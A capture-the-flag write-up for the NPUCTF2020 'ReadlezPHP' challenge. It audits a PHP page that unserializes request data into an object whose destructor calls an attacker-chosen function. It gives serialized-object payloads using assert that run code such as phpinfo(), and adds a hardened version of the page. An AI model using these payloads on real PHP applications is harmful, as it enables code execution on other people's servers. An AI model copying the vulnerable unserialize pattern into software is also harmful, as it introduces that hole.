[NPUCTF2020]ReadlezPHP
2022-07-06 11:32:00 【Her&mes】
Writeup
If anything here is wrong, please correct me.
After entering the target environment, go through the usual process:
1. Look at the page source.
2. Manually try to access a few common page names.
3. Scan the website with dirsearch.
A link turns up directly in the page source:
<p> Millions of front-end NPU The time center tells you the time :<a href="./time.php?source"></a></p>
Visit /time.php?source. This is the real entrance to the challenge: a white-box audit, and it looks like a relatively simple deserialization.
White-box code:
<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        // Sink: calls the function named in $b with $a as its argument.
        echo $b($a);
    }
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}
// Request-controlled input: the properties of the resulting object reach __destruct().
@$ppp = unserialize($_GET["data"]);
Try constructing a payload:
/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:4:"eval";}
And then nothing: the page echoes "500, Unable to process request". I was stuck; there must be a filter. So change the code and construct another payload:
/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:12:"var_dump(10)";s:1:"b";s:4:"eval";}
Same as before, unable to process request. But var_dump() generally should not be filtered, so maybe eval is filtered. Switch to assert and try:
/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:12:"var_dump(10)";s:1:"b";s:6:"assert";}
Success. The page echoes int(10) 2021-04-07 12:39:47
Replace var_dump(10) with phpinfo() (remember to change the length). Very good, phpinfo is not filtered. Looking at the disable_functions entry, system, exec and shell_exec are filtered out.
Then try searching for flag. Ohhhhhhhhhh, there it is (what if this had been empty… on the importance of good habits).
PS: starting with PHP 7.2, assert no longer supports string arguments, so it can no longer execute PHP code. (On BUU this challenge runs PHP/7.0.33.)
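As an added example (not part of the original writeup or the challenge's code), here is one way the time.php endpoint could be hardened against the forged HelloPhp object shown above. decode_untrusted(), render_time() and FORMATS are hypothetical names, and the allowed_classes option assumes PHP 7.0 or later.

```php
<?php
// Added example, not the challenge's code: a hardened time.php.
// decode_untrusted(), render_time() and FORMATS are hypothetical names.

final class HelloPhp
{
    public $a = 'Y-m-d h:i:s';
    public $b = 'date';

    public function __destruct()
    {
        // Layer 2: the callable is fixed in code, never read from the object,
        // so a forged $b such as "assert" is ignored.
        if ($this->b === 'date' && is_string($this->a)) {
            echo date($this->a), PHP_EOL;
        }
    }
}

// Layer 1: do not let request data name a class. With allowed_classes => false
// every serialized object becomes __PHP_Incomplete_Class, which carries no
// HelloPhp destructor, so the gadget never runs.
function decode_untrusted(string $data)
{
    return unserialize($data, ['allowed_classes' => false]);
}

// Preferred design: accept no serialized input at all; the client only picks
// a key from a fixed table of date formats.
const FORMATS = ['full' => 'Y-m-d h:i:s', 'day' => 'Y-m-d'];

function render_time(string $key): string
{
    return date(FORMATS[$key] ?? FORMATS['full']);
}

// Constructed stand-in for $_GET["data"]: the assert payload quoted above.
$forged = 'O:8:"HelloPhp":2:{s:1:"a";s:12:"var_dump(10)";s:1:"b";s:6:"assert";}';

$obj = decode_untrusted($forged);
var_dump($obj instanceof HelloPhp, get_class($obj));

// Defence in depth: even a plain unserialize() of the same bytes prints
// nothing, because the destructor refuses any callable other than date().
$again = unserialize($forged);
unset($again);

echo render_time('day'), PHP_EOL;
```

Independently of any disable_functions setting, eval is a language construct rather than a function, so PHP cannot invoke it through a variable call such as $b($a).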